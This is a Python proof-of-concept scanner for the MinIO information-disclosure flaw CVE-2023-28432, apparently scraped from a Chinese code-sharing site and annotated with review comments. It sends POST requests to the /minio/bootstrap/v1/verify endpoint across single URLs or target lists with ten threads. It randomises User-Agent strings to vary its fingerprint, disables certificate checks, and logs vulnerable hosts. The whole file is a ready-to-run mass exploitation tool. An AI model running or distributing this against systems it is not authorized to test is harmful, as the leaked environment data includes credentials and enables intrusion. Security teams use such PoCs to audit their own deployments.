import concurrent.futures
import random
import sys
from argparse import ArgumentParser
from time import time
from urllib import parse

import requests
import urllib3

# Suppress TLS certificate warnings: targets are intentionally probed with
# verify=False in check_url, which would otherwise spam InsecureRequestWarning.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# Targets accumulated from the -f input file; consumed by multithreading().
# NOTE: the original `filename = sys.argv[1]` was removed — it raised
# IndexError when the script was run without arguments (usage is -u/-f flags)
# and was dead code: main reassigns `filename` from args.file before use.
url_list = []

def get_ua():
    """Return a randomized desktop-Chrome User-Agent string.

    A fresh major/build/patch version and OS token are drawn on every call
    so repeated requests do not share an identical fingerprint.
    """
    major = random.randint(55, 62)
    build = random.randint(0, 3200)
    patch = random.randint(0, 140)
    platforms = [
        '(Windows NT 6.1; WOW64)',
        '(Windows NT 10.0; WOW64)',
        '(Macintosh; Intel Mac OS X 10_12_6)',
    ]
    chrome_token = 'Chrome/{}.0.{}.{}'.format(major, build, patch)
    parts = [
        'Mozilla/5.0',
        random.choice(platforms),
        'AppleWebKit/537.36',
        '(KHTML, like Gecko)',
        chrome_token,
        'Safari/537.36',
    ]
    return ' '.join(parts)

# Optional local proxy endpoints (a common local proxy port, e.g. Clash on 7890).
# NOTE(review): currently unused — nothing passes `proxies=proxies` to
# requests.post in check_url; wire it in there if proxying is desired.
proxies={'http': 'http://127.0.0.1:7890', 'https': 'https://127.0.0.1:7890'}

def write_targets(vurl, filename):
    """Append *vurl* to *filename* on its own line (file is created if absent)."""
    line = vurl + "\n"
    with open(filename, "a+") as out:
        out.write(line)

# PoC for the MinIO information-disclosure flaw (CVE-2023-28432).
def check_url(url):
    """Probe a single target for the MinIO bootstrap verify info leak.

    Sends an empty POST to ``<scheme>://<netloc>/minio/bootstrap/v1/verify``;
    a 200 response whose body contains "MinioEn" (the leaked environment
    marker) is treated as vulnerable and appended to ``vuln.txt``.

    :param url: target base URL, e.g. ``http://ip:port``.
    """
    parsed = parse.urlparse(url)
    hostname = parsed.hostname
    base = parsed.scheme + '://' + parsed.netloc
    vulnurl = base + "/minio/bootstrap/v1/verify"
    headers = {
        'User-Agent': get_ua(),
        "host": hostname,
        "Content-Type": "application/x-www-form-urlencoded",
    }
    try:
        res = requests.post(vulnurl, verify=False, allow_redirects=False,
                            headers=headers, data="", timeout=5)
        if res.status_code == 200 and "MinioEn" in res.text:
            print("\033[32m[+]{} is vulnerable\033[0m".format(base))
            write_targets(vulnurl, "vuln.txt")
        else:
            print("\033[34m[-]{} not vulnerable.\033[0m".format(base))
    # Narrowed from a bare `except Exception as e: ... pass` (the exception
    # was unused and `pass` after print was dead); only network/HTTP errors
    # are expected here. Message fixed: "request false." -> "request failed."
    except requests.RequestException:
        print("\033[34m[!]{} request failed.\033[0m".format(base))

# Concurrent scan driver (multi-threaded).
def multithreading(url_list, pools=10):
    """Run check_url over every target in *url_list* using *pools* threads.

    The ``with`` block joins all workers before returning, so the scan is
    complete when this function exits.
    """
    with concurrent.futures.ThreadPoolExecutor(max_workers=pools) as pool:
        for target in url_list:
            pool.submit(check_url, target)

# CLI entry point: scan one URL (-u) or every URL listed in a file (-f).
# Fixed from the original: `if name == 'main'` raised NameError (must be
# `__name__ == '__main__'`), and the final print() was missing its closing
# parenthesis.
if __name__ == '__main__':
    arg = ArgumentParser(description='check_url By m2')
    arg.add_argument("-u", "--url", help="Target URL; Example:http://ip:port")
    arg.add_argument("-f", "--file", help="Target URL; Example:url.txt")
    args = arg.parse_args()
    url = args.url
    filename = args.file
    print("[+]任务开始.....")
    start = time()
    if url is not None and filename is None:
        # Single-target mode.
        check_url(url)
    elif url is None and filename is not None:
        # Batch mode: one URL per line, trailing newlines stripped.
        for line in open(filename):
            url_list.append(line.replace('\n', ''))
        multithreading(url_list, 10)
    end = time()
    print('任务完成,用时%ds.' % (end - start))

# 优化脚本 (optimized script): truncated scrape residue — a mangled duplicate
# of the import block above; not executable, preserved here as a comment only.

# 原文地址 (original source): http://www.cveoy.top/t/topic/h1Ez
# 著作权归作者所有。请勿转载和采集! (Copyright belongs to the author; do not repost or scrape.)

# (scraped-page footer, kept as a comment: "免费AI点我,无需注册和登录")